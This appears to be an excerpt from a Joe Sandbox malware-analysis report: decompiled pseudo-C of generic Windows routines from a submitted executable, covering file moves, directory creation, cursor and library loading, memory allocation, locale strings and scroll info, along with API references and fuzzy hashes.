Instruction ID: ba5542fd2547f781c6491df2dc5ebc178645ed083630ab8d364c76c0fa24d7b4
Opcode Fuzzy Hash: 3e0c9b82023ef9eb735939eab937add120b80a23ec4c916cd8f99a387fd18bdf
Instruction Fuzzy Hash: AF011B75A04708BFD715CF6ADC11956BBE8E78A720B22887BEC04D36A0FB345915DE18

Uniqueness

Uniqueness Score: -1.00%

Function 00451FE0 Relevance: 3.0, APIs: 2, Instructions: 48
fileCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00451FE0(void* __eax, void* __ecx, void* __edx, void* __eflags) {
				int _v8;
				char _v16;
				long _v20;
				CHAR* _t12;
				int _t15;
				intOrPtr _t30;
				void* _t38;
				void* _t40;
				intOrPtr _t41;

				_t38 = _t40;
				_t41 = _t40 + 0xfffffff0;
				if(E00451A84(__eax,  &_v16) != 0) {
					_push(_t38);
					_push(0x452048);
					_push( *[fs:eax]);
					 *[fs:eax] = _t41;
					_t12 = E00403738(__ecx);
					_t15 = MoveFileA(E00403738(__edx), _t12); // executed
					_v8 = _t15;
					_v20 = GetLastError();
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(0x45204f);
					return E00451AC0( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}

0x00451fe1
0x00451fe3
0x00451ffb
0x00452006
0x00452007
0x0045200c
0x0045200f
0x00452014
0x00452022
0x00452027
0x0045202f
0x00452034
0x00452037
0x0045203a
0x00452047
0x00451ffd
0x00451fff
0x00452061
0x00452061

APIs

MoveFileA.KERNEL32 ref: 00452022
GetLastError.KERNEL32(00000000,00000000,00000000,00452048), ref: 0045202A

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorFileLastMove
String ID:
API String ID: 55378915-0
Opcode ID: 1845678bfe1f7006c542e362d27ffbce14d005dd821da547dc8afd5dc54331c6
Instruction ID: b9eff51345b8b7871c1011999a0b636bec304ecd6ca236fc282542a6da5c4eb4
Opcode Fuzzy Hash: 1845678bfe1f7006c542e362d27ffbce14d005dd821da547dc8afd5dc54331c6
Instruction Fuzzy Hash: C3014971B01604BBCB01EF799D4149EB7ECDB89725360457BFD08E3283EA7C4E088598

Uniqueness

Uniqueness Score: -1.00%

Function 00451AD0 Relevance: 3.0, APIs: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00451AD0(void* __eax, void* __edx, void* __eflags) {
				int _v8;
				char _v16;
				long _v20;
				int _t13;
				intOrPtr _t27;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff0;
				if(E00451A84(__eax,  &_v16) != 0) {
					_push(_t32);
					_push(0x451b2f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t35;
					_t13 = CreateDirectoryA(E00403738(__edx), 0); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x451b36);
					return E00451AC0( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}

0x00451ad1
0x00451ad3
0x00451ae8
0x00451af3
0x00451af4
0x00451af9
0x00451afc
0x00451b09
0x00451b0e
0x00451b16
0x00451b1b
0x00451b1e
0x00451b21
0x00451b2e
0x00451aea
0x00451aec
0x00451b47
0x00451b47

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00451B2F), ref: 00451B09
GetLastError.KERNEL32(00000000,00000000,00000000,00451B2F), ref: 00451B11

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 563f8bf67e9e20bb0afe1ab7f644b96e044f0cc51ef97c64e7cc1a2122d4c18e
Instruction ID: 81bbb39f5a38f401018786416ba8ff2287df4e0b761d8d795be4b0ce8710cbb4
Opcode Fuzzy Hash: 563f8bf67e9e20bb0afe1ab7f644b96e044f0cc51ef97c64e7cc1a2122d4c18e
Instruction Fuzzy Hash: 84F02871A00204ABCB01DF759C01A9EB7E8DB08315B1045BBFC04E3252F63D5E148598

Uniqueness

Uniqueness Score: -1.00%

Function 00423224 Relevance: 3.0, APIs: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423224(void* __eax) {
				struct HICON__* _t5;
				void* _t7;
				void* _t8;
				struct HINSTANCE__* _t11;
				CHAR** _t12;
				void* _t13;

				_t13 = __eax;
				 *((intOrPtr*)(_t13 + 0x38)) = LoadCursorA(0, 0x7f00);
				_t8 = 0xffffffec;
				_t12 = 0x4985e4;
				do {
					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
						_t11 = 0;
					} else {
						_t11 =  *0x49a014; // 0x400000
					}
					_t5 = LoadCursorA(_t11,  *_t12); // executed
					_t7 = E00423318(_t13, _t5, _t8);
					_t8 = _t8 + 1;
					_t12 =  &(_t12[1]);
				} while (_t8 != 0xffffffff);
				return _t7;
			}

0x00423228
0x00423236
0x00423239
0x0042323e
0x00423243
0x00423246
0x00423255
0x0042324d
0x0042324d
0x0042324d
0x0042325b
0x00423266
0x0042326b
0x0042326c
0x0042326f
0x00423278

APIs

LoadCursorA.USER32 ref: 00423231
LoadCursorA.USER32 ref: 0042325B

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CursorLoad
String ID:
API String ID: 3238433803-0
Opcode ID: 78cca4750e793ac7adf5cb8bf8fd85fa5cfcf53a15d90ff592724969511865a5
Instruction ID: 3e67275c8bdd7dfa88ab74454ff6d801d359b6300bed2acf0724d9ae45bacfb2
Opcode Fuzzy Hash: 78cca4750e793ac7adf5cb8bf8fd85fa5cfcf53a15d90ff592724969511865a5
Instruction Fuzzy Hash: D5F0A71174011066D6505D3E6CC1A6A72689BC2775B71037BFB3FD72D1CA2E6E4141BD

Uniqueness

Uniqueness Score: -1.00%

Function 0042E294 Relevance: 3.0, APIs: 2, Instructions: 33
libraryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0042E294(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x42e306);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x42e2e8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_t9 = LoadLibraryA(E00403738(_t12)); // executed
				_v12 = _t9;
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(E0042E2EF);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}

0x0042e295
0x0042e297
0x0042e29b
0x0042e29e
0x0042e2a3
0x0042e2a8
0x0042e2a9
0x0042e2ae
0x0042e2b1
0x0042e2b4
0x0042e2b9
0x0042e2ba
0x0042e2bf
0x0042e2c2
0x0042e2cd
0x0042e2d2
0x0042e2d7
0x0042e2da
0x0042e2dd
0x0042e2e2
0x0042e2e4
0x0042e2e7

APIs

SetErrorMode.KERNEL32(00008000), ref: 0042E29E
LoadLibraryA.KERNEL32(00000000,00000000,0042E2E8,?,00000000,0042E306,?,00008000), ref: 0042E2CD

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 8d85eb380502a5283e1fc0206abe0acada7dea1f2e8d8d03aeef51df10394832
Instruction ID: 1eef3f08b3603f4b9bcb28d695b022b75d39dfbbdd59c9d79d79570b9304c5b2
Opcode Fuzzy Hash: 8d85eb380502a5283e1fc0206abe0acada7dea1f2e8d8d03aeef51df10394832
Instruction Fuzzy Hash: 0AF08270B14744BFDB119F779C6282BBBECE74DB1079249B6F800A3A91E63C5910C938

Uniqueness

Uniqueness Score: -1.00%

Function 004162B2 Relevance: 3.0, APIs: 2, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004162B2(CHAR* __ecx, void* __edx) {
				void* _t5;
				struct HINSTANCE__* _t7;
				int _t8;
				struct _WNDCLASSA _t11;
				void* _t14;
				CHAR* _t17;

				_t17 = __ecx;
				_t14 = __edx;
				if(__ecx != 0) {
					_t7 =  *0x49a014; // 0x400000
					_t8 = GetClassInfoA(_t7, __ecx, __edx + 0x24); // executed
					if(_t8 == 0) {
						GetClassInfoA(0, _t17, _t14 + 0x24);
					}
					_t11 =  *(_t14 + 0x24) & 0xffffbf1f | 0x00000003;
					 *(_t14 + 0x24) = _t11;
					return _t11;
				}
				return _t5;
			}

0x004162b6
0x004162b8
0x004162bc
0x004162c3
0x004162c9
0x004162d0
0x004162d9
0x004162d9
0x004162e6
0x004162e9
0x00000000
0x004162e9
0x004162ee

APIs

GetClassInfoA.USER32 ref: 004162C9
GetClassInfoA.USER32 ref: 004162D9

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: d429aef6ea4eea9c35804ce5609d83cca1e84f5bf9d9157b3563b74df447d877
Instruction ID: a64a2d3efa17df1144ab3aea37866fc4dc7d928b9fa9eac647d3d1d98e8338c5
Opcode Fuzzy Hash: d429aef6ea4eea9c35804ce5609d83cca1e84f5bf9d9157b3563b74df447d877
Instruction Fuzzy Hash: 81E01AB26016206AEB10DFA99D81EE32BDCDB08310B1201B3BE04CB286D7A4DD104BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0044FC58 Relevance: 3.0, APIs: 2, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044FC58(intOrPtr* __eax, void* __ecx, void* __edx) {
				long _v8;
				long _t7;
				long _t8;
				intOrPtr* _t10;

				_t10 = __eax;
				_v8 = 0;
				_t7 = SetFilePointer( *(__eax + 4), 0,  &_v8, 2); // executed
				_t8 = _t7 + 1;
				if(_t8 == 0) {
					_t8 = GetLastError();
					if(_t8 != 0) {
						_t8 = E0044FA14( *_t10);
					}
				}
				return _t8;
			}

0x0044fc5a
0x0044fc5e
0x0044fc6e
0x0044fc73
0x0044fc74
0x0044fc76
0x0044fc7d
0x0044fc81
0x0044fc81
0x0044fc7d
0x0044fc88

APIs

SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046EDA5,?,00000000), ref: 0044FC6E
GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046EDA5,?,00000000), ref: 0044FC76

Part of subcall function 0044FA14: GetLastError.KERNEL32(0044F830,0044FAD6,?,00000000,?,00496128,00000001,00000000,00000002,00000000,00496289,?,?,00000005,00000000,004962BD), ref: 0044FA17

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 69a82938775a7cc58e39884cd4278003b8488c1f5b492a3041655513dd7201f5
Instruction ID: e0edb2410980d5740b82e74ec1d1a3a58f61ffe58ec814ff12274e4ce374728a
Opcode Fuzzy Hash: 69a82938775a7cc58e39884cd4278003b8488c1f5b492a3041655513dd7201f5
Instruction Fuzzy Hash: 6EE012B13056055BFB00EAA599C1F3B22D8EB48315F00487AB948DF182E674CC059B65

Uniqueness

Uniqueness Score: -1.00%

Function 00406274 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406274(int __eax, long __edx) {
				void* _t2;

				_t2 = GlobalAlloc(__eax, __edx); // executed
				GlobalFix(_t2);
				return _t2;
			}

0x00406276
0x0040627c
0x00406281

APIs

GlobalAlloc.KERNEL32 ref: 00406276
GlobalFix.KERNEL32(00000000), ref: 0040627C

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Global$Alloc
String ID:
API String ID: 2558781224-0
Opcode ID: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
Instruction ID: 0263706b80ae8aebac4b2aeda69df254121a1764ed820e2db5cbcbfbef09bb73
Opcode Fuzzy Hash: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
Instruction Fuzzy Hash: 3D9002C4C10B01A4DC0432B24C0BC3F0C2CD8C072C3C0486F7018B6183883C8800083C

Uniqueness

Uniqueness Score: -1.00%

Function 004014E4 Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014E4(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E00401398(0x49a440, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}

0x004014e7
0x004014f1
0x00401500
0x004014f3
0x004014f3
0x004014f3
0x00401506
0x00401513
0x00401518
0x0040151a
0x0040151e
0x00401527
0x0040152e
0x0040153a
0x00401541
0x00000000
0x00401541
0x0040152e
0x00401546

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
Instruction ID: b33c25bc9d44e5855224c25112d8485d4e2e4d0ac397fdc44bd3a0d1e7be2c31
Opcode Fuzzy Hash: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
Instruction Fuzzy Hash: 3BF08272A0063067EB60596A4C85B5359C49BC5794F154076FD09FF3E9D6B98C0142A9

Uniqueness

Uniqueness Score: -1.00%

Function 004085BC Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004085BC(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				char _v16;
				char _v20;
				void* _t76;
				void* _t77;
				intOrPtr _t103;
				void* _t106;
				void* _t107;
				void* _t109;
				void* _t110;
				void* _t113;

				_v16 = 0;
				_v20 = 0;
				_push(_t113);
				_push(0x4086f2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffff0;
				_v12 = GetSystemDefaultLCID();
				_t76 = 1;
				_t109 = 0x49a4c0;
				_t106 = 0x49a4f0;
				do {
					_t6 = _t76 + 0xffbf; // 0xffc0
					E00406DCC(_t6,  &_v20);
					_t8 = _t76 + 0x44; // 0x45
					E00408548(_v12, _v20, _t8 - 1,  &_v16); // executed
					E00403450(_t109, _t76, _v16, _t106, _t109);
					_t13 = _t76 + 0xffcf; // 0xffd0
					E00406DCC(_t13,  &_v20);
					_t15 = _t76 + 0x38; // 0x39
					E00408548(_v12, _v20, _t15 - 1,  &_v16);
					E00403450(_t106, _t76, _v16, _t106, _t109);
					_t76 = _t76 + 1;
					_t106 = _t106 + 4;
					_t109 = _t109 + 4;
				} while (_t76 != 0xd);
				_t77 = 1;
				_t110 = 0x49a520;
				_t107 = 0x49a53c;
				do {
					_t18 = _t77 + 5; // 0x6
					asm("cdq");
					_v8 = _t18 % 7;
					_t26 = _t77 + 0xffdf; // 0xffe0
					E00406DCC(_t26,  &_v20);
					E00408548(_v12, _v20, _v8 + 0x31,  &_v16);
					E00403450(_t110, _t77, _v16, _t107, _t110);
					_t33 = _t77 + 0xffe6; // 0xffe7
					E00406DCC(_t33,  &_v20);
					E00408548(_v12, _v20, _v8 + 0x2a,  &_v16);
					E00403450(_t107, _t77, _v16, _t107, _t110);
					_t77 = _t77 + 1;
					_t107 = _t107 + 4;
					_t110 = _t110 + 4;
				} while (_t77 != 8);
				_pop(_t103);
				 *[fs:eax] = _t103;
				_push(E004086F9);
				return E00403420( &_v20, 2);
			}

0x004085c7
0x004085ca
0x004085cf
0x004085d0
0x004085d5
0x004085d8
0x004085e0
0x004085e3
0x004085e8
0x004085ed
0x004085f2
0x004085f9
0x004085ff
0x00408607
0x0040860e
0x00408618
0x00408624
0x0040862a
0x00408632
0x00408639
0x00408643
0x00408648
0x00408649
0x0040864c
0x0040864f
0x00408654
0x00408659
0x0040865e
0x00408663
0x00408663
0x0040866b
0x0040866e
0x00408678
0x0040867e
0x0040868f
0x00408699
0x004086a5
0x004086ab
0x004086bc
0x004086c6
0x004086cb
0x004086cc
0x004086cf
0x004086d2
0x004086d9
0x004086dc
0x004086df
0x004086f1

APIs

GetSystemDefaultLCID.KERNEL32(00000000,004086F2), ref: 004085DB

Part of subcall function 00406DCC: LoadStringA.USER32 ref: 00406DE9

Part of subcall function 00408548: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,00408613,?,00000000,004086F2), ref: 00408566

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: DefaultInfoLoadLocaleStringSystem
String ID:
API String ID: 1658689577-0
Opcode ID: a525cbd3d240e40b9a8e61725c1d0d5fb3ff0f7f2fe451f1bb0595dfe248f2f1
Instruction ID: 800c816fdee51ba3b703f3c65523d0dbbfe6500425a376066ce8a62c5dc1c991
Opcode Fuzzy Hash: a525cbd3d240e40b9a8e61725c1d0d5fb3ff0f7f2fe451f1bb0595dfe248f2f1
Instruction Fuzzy Hash: 7C318435E0011AABCB01DF55C8809DEB779FF84318F518577E815BB386EB38AE058B98

Uniqueness

Uniqueness Score: -1.00%

Function 0041FB84 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041FB84(void* __eax, char __ecx, void* __edx) {
				struct tagSCROLLINFO _v44;
				intOrPtr _t28;
				void* _t40;
				void* _t48;
				signed short _t49;
				intOrPtr _t51;

				_t52 =  &(_v44.nMax);
				_v44.nMax = __ecx;
				_t40 = __edx;
				_t48 = __eax;
				 *((intOrPtr*)(__eax + 0x14)) = 0;
				_t49 = 0;
				if( *((char*)(__eax + 0x18)) == 1) {
					_t49 = 1;
				}
				if( *((char*)(_t48 + 0x1c)) != 0) {
					_t51 =  *((intOrPtr*)(_t48 + 0x10)) - E0041F924(_t48,  *_t52, _t40);
					 *((intOrPtr*)(_t48 + 0x14)) = _t51;
					if(_t51 < 0) {
						 *((intOrPtr*)(_t48 + 0x14)) = 0;
					}
				}
				_v44.cbSize = 0x1c;
				_v44.fMask = 0x17;
				_v44.nMin = 0;
				if( *((intOrPtr*)(_t48 + 0x14)) <= 0) {
					_v44.nMax = 0;
				} else {
					_v44.nMax =  *((intOrPtr*)(_t48 + 0x10));
				}
				_v44.nPage = E0041F924(_t48,  *_t52, _t40) + 1;
				_t28 =  *((intOrPtr*)(_t48 + 0xc));
				_v44.nPos = _t28;
				_v44.nTrackPos = _t28;
				SetScrollInfo(E004181C8( *((intOrPtr*)(_t48 + 4))), _t49 & 0x0000ffff,  &_v44, 1); // executed
				return E0041FA84(_t48,  *((intOrPtr*)(_t48 + 0xc)));
			}

0x0041fb88
0x0041fb8b
0x0041fb8e
0x0041fb90
0x0041fb94
0x0041fb97
0x0041fb9d
0x0041fb9f
0x0041fb9f
0x0041fba7
0x0041fbb8
0x0041fbba
0x0041fbbf
0x0041fbc3
0x0041fbc3
0x0041fbbf
0x0041fbc6
0x0041fbce
0x0041fbd8
0x0041fbe0
0x0041fbed
0x0041fbe2
0x0041fbe5
0x0041fbe5
0x0041fbfe
0x0041fc02
0x0041fc05
0x0041fc09
0x0041fc21
0x0041fc37

APIs

SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC21

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: InfoScroll
String ID:
API String ID: 629608716-0
Opcode ID: 6fa65a4ba40a25fdb461d21021e26bda7efdb10b8330298da01b036f4386a8c7
Instruction ID: ad1b1eea4229ece2b5e5a0dfcbebc4532a380c29954d1d5d1310598ff1b3e549
Opcode Fuzzy Hash: 6fa65a4ba40a25fdb461d21021e26bda7efdb10b8330298da01b036f4386a8c7
Instruction Fuzzy Hash: 982130B16087456FC340DF29D4406A7BBE4BB48314F14493EE498C3341E774E996CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 0046B148 Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0046B148(void* __eax, void* __edi, void* __esi) {
				intOrPtr* _v8;
				void* __ebx;
				void* __ebp;
				void* _t3;
				intOrPtr* _t5;
				void* _t14;
				intOrPtr _t20;
				intOrPtr _t24;
				intOrPtr _t26;

				_t3 = __eax;
				_t24 = _t26;
				_t14 = __eax;
				if( *0x49b380 < 0x5010000 ||  *0x49b054 == 0) {
					return _t3;
				} else {
					_t5 = E0041EE8C(0, __eax, __edi, __esi); // executed
					_v8 = _t5;
					 *[fs:eax] = _t26;
					 *0x49b054(0, E00403738(_t14), 0,  *[fs:eax], 0x46b1a6, _t24); // executed
					_t20 = 0;
					 *[fs:eax] = _t20;
					_push(0x46b1ad);
					return E0041EF40(_v8);
				}
			}

0x0046b148
0x0046b149
0x0046b14d
0x0046b159
0x0046b1b0
0x0046b164
0x0046b166
0x0046b16b
0x0046b179
0x0046b18a
0x0046b192
0x0046b195
0x0046b198
0x0046b1a5
0x0046b1a5

APIs

Part of subcall function 0041EE8C: GetCurrentThreadId.KERNEL32 ref: 0041EEDB
Part of subcall function 0041EE8C: 740BAC10.USER32(00000000,0041EE3C,00000000,00000000,0041EEF8,?,00000000,0041EF2F,?,0042EB08,?,00000001), ref: 0041EEE1

SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046B1A6,?,00000000,?,?,0046B3B3,?,00000000,0046B3F2), ref: 0046B18A

Part of subcall function 0041EF40: IsWindow.USER32(?), ref: 0041EF4E
Part of subcall function 0041EF40: EnableWindow.USER32(?,00000001), ref: 0041EF5D

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$CurrentEnablePathPrepareThreadWrite
String ID:
API String ID: 3199803127-0
